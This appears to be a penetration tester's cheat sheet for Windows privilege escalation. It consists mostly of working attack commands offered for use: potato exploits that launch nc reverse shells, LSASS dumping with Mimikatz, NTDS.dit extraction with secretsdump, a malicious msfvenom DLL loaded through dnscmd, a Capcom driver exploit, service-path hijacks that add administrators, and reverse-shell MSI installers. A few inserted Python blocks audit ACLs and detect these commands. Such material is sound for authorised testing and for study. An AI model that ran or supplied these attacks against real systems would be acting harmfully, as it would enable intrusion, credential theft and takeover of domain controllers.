JuicyPotato can be used to exploit the SeImpersonate or SeAssignPrimaryToken privileges via DCOM/NTLM reflection abuse.
c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe ip 8443 -e cmd.exe" -t *
JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer and RoguePotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access.
# start a listener on kali and run this command on the windows target host
PrintSpoofer.exe -c "c:\tools\nc.exe ip 8443 -e cmd"
SeDebugPrivilege
We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory. A good candidate is the Local Security Authority Subsystem Service (LSASS) process, which stores user credentials after a user logs on to a system.
procdump.exe -accepteula -ma lsass.exe lsass.dmp
We can load this dump in Mimikatz using the sekurlsa::minidump command. After issuing the sekurlsa::logonPasswords command, we gain the NTLM hash of the local administrator account logged on locally. We can use this to perform a pass-the-hash attack to move laterally if the same local administrator password is used on one or more additional systems.
# Starting mimikatz
mimikatz.exe
# extracting hashes from the lsass.dmp file
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Remote Code Execution as SYSTEM
Transfer this PoC script over to the target system. Next, we load the script and run it with the following syntax: [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,""). Note that we must add a third blank argument "" at the end for the PoC to work properly.
# First, open an elevated PowerShell console (right-click, run as admin, and type in the credentials for the user).
# Next, type tasklist to get a listing of running processes and accompanying PIDs.
tasklist
# running the poc to get a system shell, or a reverse shell as system
.\psgetsys.ps1
[MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")
SeTakeOwnershipPrivilege
Enabling SeTakeOwnershipPrivilege - We can enable it using this script, which is detailed in this blog post, as well as this one, which builds on the initial concept.
# Enabling SeTakeOwnershipPrivilege
Import-Module .\Enable-Privilege.ps1
.\EnableAllTokenPrivs.ps1
whoami /priv
# Choosing a Target File
Get-ChildItem -Path 'C:\FILE-PATH' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}
# Checking File Ownership
cmd /c dir /q 'C:\FILE-PATH'
# Taking Ownership of the File
# Now we can use the takeown Windows binary to change ownership of the file.
takeown /f 'C:\FILE-PATH'
# Confirming Ownership Changed
Get-ChildItem -Path 'C:\FILE-PATH' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}
# Modifying the File ACL
icacls 'C:\FILE-PATH' /grant eren:F
Membership of the Backup Operators group grants its members the SeBackup and SeRestore privileges. The SeBackupPrivilege allows us to traverse any folder and list its contents. This lets us copy a file from a folder even if there is no access control entry (ACE) for us in the folder's access control list (ACL). We can't do this using the standard copy command; instead, we need to programmatically copy the data, making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.
We can use this PoC to exploit the SeBackupPrivilege, and copy this file. First, let's import the libraries in a PowerShell session.
Enabling SeBackupPrivilege - Set-SeBackupPrivilege
# Importing Libraries
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
# Copying a Protected File
Copy-FileSeBackupPrivilege 'C:\Confidential\Contract.txt' .\Contract.txt
Attacking a Domain Controller - Copying NTDS.dit
As the NTDS.dit file is locked by default, we can use the Windows diskshadow utility to create a shadow copy of the C drive and expose it as the E drive. The NTDS.dit in this shadow copy won't be in use by the system.
diskshadow.exe
# Copying NTDS.dit Locally
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
# Extracting Credentials from NTDS.dit using DSInternals or secretsdump.py
# obtain the NTLM hash for just the administrator account of the domain using DSInternals
Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=domain,DC=local' -DBPath .\ntds.dit -BootKey $key
# Extracting Hashes Using SecretsDump
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
Event Log Readers Group
Administrators and members of the Event Log Readers group have permission to read the local system logs.
Confirming Group Membership - net localgroup "Event Log Readers"
We can query Windows events from the command line using the wevtutil utility and the Get-WinEvent PowerShell cmdlet.
# Searching Security Logs Using wevtutil
wevtutil qe Security /rd:true /f:text | Select-String "/user"
# Passing Credentials to wevtutil
wevtutil qe Security /rd:true /f:text /r:share01 /u:user.name /p:Welcome1 | findstr "/user"
DnsAdmins Group
DNS management is performed over RPC.
ServerLevelPluginDll allows us to load a custom DLL with zero verification of the DLL's path. This can be done with the dnscmd tool from the command line.
When a member of the DnsAdmins group runs the dnscmd command below, the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll registry key is populated.
When the DNS service is restarted, the DLL in this path will be loaded (the path can be a network share that the Domain Controller's machine account can access).
An attacker can load a custom DLL to obtain a reverse shell or even load a tool such as Mimikatz as a DLL to dump credentials.
Leveraging DnsAdmins Access
# Generating Malicious DLL
msfvenom -p windows/x64/exec cmd='net group "domain admins" user /add /domain' -f dll -o adduser.dll
# Starting Local HTTP Server
python3 -m http.server
# Downloading File to Target
PS C:\> wget "http://ip/adduser.dll" -outfile "adduser.dll"
# Loading Custom DLL
C:\> dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
With the registry setting containing the path of our malicious plugin configured, and our payload created, the DLL will be loaded the next time the DNS service is started. Membership in the DnsAdmins group doesn't give the ability to restart the DNS service, but this is conceivably something that sysadmins might permit DNS admins to do.
# Finding User's SID
wmic useraccount where name="user" get sid
# Checking Permissions on DNS Service
sc.exe sdshow DNS
# Stopping the DNS Service
sc stop dns
# Starting the DNS Service
sc start dns
# Confirming Group Membership
net group "Domain Admins" /dom
Cleaning Up
# The first step is confirming that the ServerLevelPluginDll registry key exists. Until our custom DLL is removed, we will not be able to start the DNS service again correctly.
reg query \\10.10.10.10\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters
# Deleting Registry Key
reg delete \\10.10.10.10\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll
# Starting the DNS Service Again
sc.exe start dns
# Checking DNS Service Status
sc query dns
Using Mimilib.dll
We could also utilize mimilib.dll from the creator of the Mimikatz tool to gain command execution by modifying the kdns.c file to execute a reverse shell one-liner or another command of our choosing.
Print Operators Group
We can use this tool to load the driver. The PoC enables the privilege as well as loads the driver for us.
Download it locally and edit it, pasting over the includes below.
#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"
# Compile it using cl.exe from a Visual Studio 2019 Developer Command Prompt
C:\Users\eren\Desktop\PrintOperators>cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
# Next, download the Capcom.sys driver from <https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys>, and save it to C:\temp.
# Issue the commands below to add a reference to this driver under our HKEY_CURRENT_USER tree.
reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"
reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1
# Verify Driver is not Loaded
.\DriverView.exe /stext drivers.txt
cat drivers.txt | Select-String -pattern Capcom
# Verify Privilege is Enabled, Run the EnableSeLoadDriverPrivilege.exe binary.
EnableSeLoadDriverPrivilege.exe
# Verify Capcom Driver is Listed
.\DriverView.exe /stext drivers.txt
cat drivers.txt | Select-String -pattern Capcom
# Use ExploitCapcom Tool to Escalate Privileges
# To exploit Capcom.sys, we can use the ExploitCapcom tool after compiling it with Visual Studio.
.\ExploitCapcom.exe
Alternate Exploitation - No GUI
If we do not have GUI access to the target, we will have to modify the ExploitCapcom.cpp code before compiling. Here we can edit line 292 and replace "C:\Windows\system32\cmd.exe" with, say, a reverse shell binary created with msfvenom, for example c:\ProgramData\revshell.exe.
We would set up a listener based on the msfvenom payload we generated and hopefully receive a reverse shell connection back when executing ExploitCapcom.exe. If a reverse shell connection is blocked for some reason, we can try a bind shell or exec/add user payload.
Automating with EopLoadDriver
We can use a tool such as EoPLoadDriver to automate the process of enabling the privilege, creating the registry key, and executing NTLoadDriver to load the driver. To do this, we would run the following:
# Querying the Service, checking whether it starts with system privileges
sc qc service
# Checking Service Permissions with PsService
c:\Tools\PsService.exe security service
# Checking Local Admin Group Membership
net localgroup Administrators
# Modifying the Service Binary Path
sc config service binPath= "cmd /c net localgroup Administrators server_adm /add"
# Starting the service
sc start service
# Confirming Local Admin Group Membership
net localgroup Administrators
# Confirming Local Admin Access on the Domain Controller
crackmapexec smb ip -u server_adm -p 'pass'
# Retrieving NTLM Password Hashes from the Domain Controller
secretsdump.py server_adm@ip -just-dc-user administrator
Weak Permissions
Permissive File System ACLs
# We can use SharpUp from the GhostPack suite of tools to check for service binaries suffering from weak ACLs.
.\SharpUp.exe audit
# Checking Permissions with icacls on the binaries we got in the above step
# Look whether the EVERYONE and BUILTIN\Users groups have been granted full permissions to the directory, in which case any unprivileged system user can manipulate the directory and its contents.
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"   <-- binary path
# Replacing the Service Binary, if we have start/stop privileges, so that we can start the service and execute our reverse shell
cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
sc start SecurityService
# The other choice would be to create an admin user, if we cannot start the service
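Defender-side counterpart to the icacls check above, added here and not part of the original notes: it parses icacls output for a service binary (a constructed sample, not a real host), reports the allow-ACEs that give low-privilege principals write-class rights, and emits one conservative icacls fix. The principal and rights lists are assumptions chosen for this example.

```python
import re

# Constructed sample in the shape of `icacls "<path>"` output (not captured from a real host):
# inherited ACEs grant Everyone and BUILTIN\Users full control of the service binary.
SAMPLE_ICACLS = r"""C:\Program Files (x86)\PCProtect\SecurityService.exe Everyone:(I)(F)
                                                     BUILTIN\Users:(I)(F)
                                                     NT AUTHORITY\Authenticated Users:(I)(RX)
                                                     NT AUTHORITY\SYSTEM:(I)(F)
                                                     BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

ACE = re.compile(r"^(.+?):((?:\([^)]*\))+)$")          # principal:(flag)(flag)...(right)
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP", "DENY"}   # inheritance/deny markers, not rights
# Rights that let the holder replace, rewrite, delete or re-own the file (assumed list).
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO", "DC", "GA", "GW"}
LOW_PRIV_PRINCIPALS = {"everyone", "users", "builtin\\users", "nt authority\\interactive",
                       "nt authority\\authenticated users"}

def parse_icacls(output, path):
    """Return [(principal, is_deny, set_of_rights)] from icacls output for `path`."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):                  # first line carries the path before the ACE
            line = line[len(path):].strip()
        m = ACE.match(line)
        if not m:
            continue
        parts = re.findall(r"\(([^)]*)\)", m.group(2))
        aces.append((m.group(1), "DENY" in parts, {p for p in parts if p not in INHERIT_FLAGS}))
    return aces

def weak_aces(output, path):
    """Allow-ACEs that give a low-privilege principal write-class access: these are the
    entries that make the binary, and so the service's SYSTEM context, replaceable."""
    return [(principal, sorted(rights & WRITE_RIGHTS))
            for principal, deny, rights in parse_icacls(output, path)
            if not deny and principal.lower() in LOW_PRIV_PRINCIPALS and rights & WRITE_RIGHTS]

def remediation(path):
    """One conservative fix: drop inheritance, admins/SYSTEM keep full control, users get RX."""
    return (f'icacls "{path}" /inheritance:r /grant:r "BUILTIN\\Administrators:(F)" '
            f'"NT AUTHORITY\\SYSTEM:(F)" "BUILTIN\\Users:(RX)"')

if __name__ == "__main__":
    svc = r"C:\Program Files (x86)\PCProtect\SecurityService.exe"
    for principal, rights in weak_aces(SAMPLE_ICACLS, svc):
        print(f"WEAK: {principal} has {','.join(rights)} on {svc}")
    print(remediation(svc))
```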
Weak Service Permissions
# Check the SharpUp output for any modifiable services.
SharpUp.exe audit
# Checking Permissions with AccessChk
# -q (omit banner) -u (suppress errors) -v (verbose) -c (specify name of a Windows service) -w (show only objects that have write access)
# If we have SERVICE_ALL_ACCESS, we have full read/write control
accesschk.exe /accepteula -quvcw Service
# Changing the Service Binary Path
sc config WindscribeService binpath= "cmd /c net localgroup administrators <user we are currently logged in with> /add"
# Stopping the Service
sc stop Service
# Starting the Service
sc start Service
# Confirming Local Admin Group Addition
net localgroup administrators
Cleanup
# Reverting the Binary Path
sc config Service binpath= "c:\Program Files (x86)\Windscribe\WindscribeService.exe"
# Checking the Service Status Again
sc query Service
Unquoted Service Path
# We can identify unquoted service binary paths using the command below.
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# Query the "dash" service and note whether it runs with SYSTEM privileges (SERVICE_START_NAME) and whether the BINARY_PATH_NAME is unquoted and contains spaces.
sc qc service_name
# Using accesschk.exe, note whether the BUILTIN\Users group is allowed to write to the C:\Program Files\Unquoted Path Service\ directory:
accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
# Copy the reverse.exe executable to this directory and rename it according to the requirements.
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
# Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
net start service_name
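Audit-side version of the unquoted-path check above, added here as an example that is not part of the original notes. It generalises the "Common.exe" case by computing every image name CreateProcess would try for an unquoted path with spaces, applies the same filter as the wmic/findstr one-liner, and produces the sc config fix. The service records are a constructed sample with assumed field names.

```python
import ntpath
from typing import NamedTuple

class Service(NamedTuple):
    name: str
    path_name: str    # BINARY_PATH_NAME as shown by `sc qc` / wmic
    start_mode: str   # Auto / Manual / Disabled
    start_name: str   # SERVICE_START_NAME (account the service runs as)

# Constructed sample services (not taken from a real host).
SAMPLE_SERVICES = [
    Service("dash", r"C:\Program Files\Unquoted Path Service\Common Files\service.exe", "Auto", "LocalSystem"),
    Service("quoted", r'"C:\Program Files\Quoted Service\svc.exe" -run', "Auto", "LocalSystem"),
    Service("spooler", r"C:\Windows\System32\spoolsv.exe", "Auto", "LocalSystem"),
    Service("manualsvc", r"C:\Program Files\Manual Tool\tool.exe", "Manual", r"NT AUTHORITY\LocalService"),
]

def hijack_candidates(path_name):
    """Image paths CreateProcess tries, in order, for an unquoted path containing spaces:
    every space-delimited prefix with .exe appended, until the real image is reached."""
    p = path_name.strip()
    if p.startswith('"') or " " not in p:
        return []
    tokens = p.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            candidates.append(prefix)      # the intended image; anything before it wins
            break
        candidates.append(prefix + ".exe")
    return candidates

def audit(services):
    """Same filter as the wmic/findstr one-liner (auto-start, outside C:\\Windows, unquoted with
    spaces); per finding, list the directories whose ACLs must deny user writes and the sc fix."""
    findings = []
    for s in services:
        cands = hijack_candidates(s.path_name)
        if not cands or s.start_mode.lower() != "auto" or s.path_name.lower().startswith("c:\\windows\\"):
            continue
        p, image = s.path_name.strip(), cands[-1]
        rest = p[len(image):] if p.lower().startswith(image.lower()) else ""   # keep any arguments
        findings.append({
            "service": s.name,
            "runs_as": s.start_name,
            "hijack_paths": cands[:-1],
            "dirs_to_check": sorted({ntpath.dirname(c) for c in cands[:-1]}),
            "fix": f'sc config {s.name} binPath= "\\"{image}\\"{rest}"',
        })
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE_SERVICES):
        print(f"{f['service']} ({f['runs_as']}): check write ACLs on {f['dirs_to_check']}; fix: {f['fix']}")
```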
Kernel Exploits
Checking Permissions on the SAM File
icacls c:\Windows\System32\config\SAM
# get system information & copy the output of systeminfo into a systeminfo.txt file
systeminfo
# Windows-Exploit-Suggester # https://github.com/AonCyberLabs/Windows-Exploit-Suggester
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
Performing Attack and Parsing Password Hashes
This PoC by @cube0x0 can be used to perform the entire attack, including dumping the NTLM hashes from the SAM database, directly in the console.
Vulnerable Services
# Enumerating Installed Programs
wmic product get name
# Enumerating Local Ports
netstat -ano | findstr 6064   <-- port
# Enumerating Process ID
get-process -Id 3324   <-- PID of the service
# Enumerating Running Service
get-service | ? {$_.DisplayName -like 'service name'}
Credential Theft
# Searching for Files
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
# Chrome Dictionary Files
gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
# PowerShell History File
# PowerShell stores command history to the file: C:\Users\username\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Confirming PowerShell History Save Path
gc (Get-PSReadLineOption).HistorySavePath
# Reading PowerShell History File
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
Manually Searching the File System for Credentials
# Search File Contents for String
cd c:\Users\user\Documents & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
# Search File Contents with PowerShell
select-string -Path C:\Users\user\Documents\*.txt -Pattern password
# Search for File Extensions
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ *.config
# Search for File Extensions Using PowerShell
Get-ChildItem C:\ -Recurse -Include *.rdp,*.config,*.vnc,*.cred -ErrorAction Ignore
# Sticky Notes Passwords
# Notes data is stored at C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
# Viewing Sticky Notes Data Using PowerShell
# Module to import: <https://github.com/RamblingCookieMonster/PSSQLite>
PS C:\> Set-ExecutionPolicy Bypass -Scope Process
PS C:\> cd .\PSSQLite\
PS C:\> Import-Module .\PSSQLite.psd1
PS C:\> $db = 'C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
PS C:\> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap
# The other choice is to copy the files to the attack host and search for interesting strings
strings plum.sqlite-wal
# Some other files we may find credentials in include the following:
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\WindowsPowerShell\*
Saved Credentials
# Listing Saved Credentials
cmdkey /list
# Run Commands as Another User
runas /savecred /user:hostname\eren "COMMAND HERE"
# Browser Credentials
# Retrieving Saved Credentials from Chrome using SharpChrome <https://github.com/GhostPack/SharpDPAPI>
.\SharpChrome.exe logins /unprotect
# Query the registry for the AlwaysInstallElevated keys
# Check whether both keys are set to 1 (0x1)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# on kali, generate a reverse shell Windows Installer (reverse.msi) using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi
# Transfer the reverse.msi file using smbserver or python
# Start a listener on Kali and then run the installer to trigger a reverse shell running with SYSTEM privileges:
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
msiexec /i c:\users\aie.msi /quiet /qn /norestart
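Detection side for the command patterns used across the sections above (dnscmd ServerLevelPluginDll, sc config binPath rewrites, procdump against LSASS, HKCU driver keys, diskshadow, admin group additions, silent msiexec installs). This is an added example, not part of the original notes: the events are constructed samples with assumed field names, and the rules are a starting point to run over 4688 or Sysmon process-creation telemetry, not a tuned ruleset.

```python
import re

# Constructed process-creation records with the fields a Security 4688 event (with command-line
# auditing on) or a Sysmon event ID 1 carries. These are made-up samples, not real telemetry.
SAMPLE_EVENTS = [
    {"user": "CORP\\netadm", "image": r"C:\Windows\System32\dnscmd.exe",
     "cmdline": r"dnscmd.exe /config /serverlevelplugindll \\10.10.10.10\share\adduser.dll"},
    {"user": "CORP\\svc_backup", "image": r"C:\Windows\System32\sc.exe",
     "cmdline": 'sc config WindscribeService binpath= "cmd /c net localgroup administrators bob /add"'},
    {"user": "CORP\\alice", "image": r"C:\Tools\procdump.exe",
     "cmdline": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"user": "CORP\\bob", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"'},
    {"user": "CORP\\dave", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i c:\users\dave\aie.msi /quiet /qn /norestart"},
    {"user": "CORP\\carol", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

# (rule name, pattern over the command line); each pattern mirrors a command used on this page.
RULES = [
    ("DnsAdmins: ServerLevelPluginDll set via dnscmd",
     re.compile(r"dnscmd(\.exe)?\s+/config\s+/serverlevelplugindll\b", re.I)),
    ("service binPath rewritten to run cmd",
     re.compile(r"\bsc(\.exe)?\s+config\s+\S+\s+binpath\s*=.*\bcmd\b", re.I)),
    ("LSASS full memory dump with procdump",
     re.compile(r"procdump.*\s-ma\s+lsass", re.I)),
    ("driver ImagePath registered under HKCU (SeLoadDriver abuse)",
     re.compile(r"\breg(\.exe)?\s+add\s+HKCU\\System\\CurrentControlSet\\.*?/v\s+ImagePath\b", re.I)),
    ("shadow copy via diskshadow (NTDS.dit exposure)",
     re.compile(r"\bdiskshadow(\.exe)?\b", re.I)),
    ("account added to an admin group",
     re.compile(r"\bnet\s+(localgroup\s+administrators|group\s+\"?domain admins\"?).*\s/add\b", re.I)),
    ("silent MSI install (correlate with AlwaysInstallElevated keys)",
     re.compile(r"msiexec(?=.*\s/i\s+\S+\.msi)(?=.*\s/q)", re.I)),
]

def detect(events):
    """Return (rule_name, user, cmdline) for each rule an event's command line matches."""
    hits = []
    for ev in events:
        for name, rx in RULES:
            if rx.search(ev["cmdline"]):
                hits.append((name, ev["user"], ev["cmdline"]))
    return hits

if __name__ == "__main__":
    for name, user, cmd in detect(SAMPLE_EVENTS):
        print(f"[{name}] {user}: {cmd}")
```

The sc config sample matches two rules at once (the binPath rewrite and the group addition inside it), which is the kind of stacked hit worth alerting on first.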
Scheduled Tasks
# Enumerating Scheduled Tasks
schtasks /query /fo LIST /v
# Enumerating Scheduled Tasks with PowerShell
Get-ScheduledTask | select TaskName,State
User/Computer Description Field
# Checking Local User Description Field
Get-LocalUser
# Enumerating Computer Description Field with the Get-WmiObject Cmdlet
Get-WmiObject -Class Win32_OperatingSystem | select Description
Mount VHDX/VMDK
# Mount VMDK on Linux
guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk
# Mount VHD/VHDX on Linux
guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1
# Retrieving Hashes using secretsdump.py
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL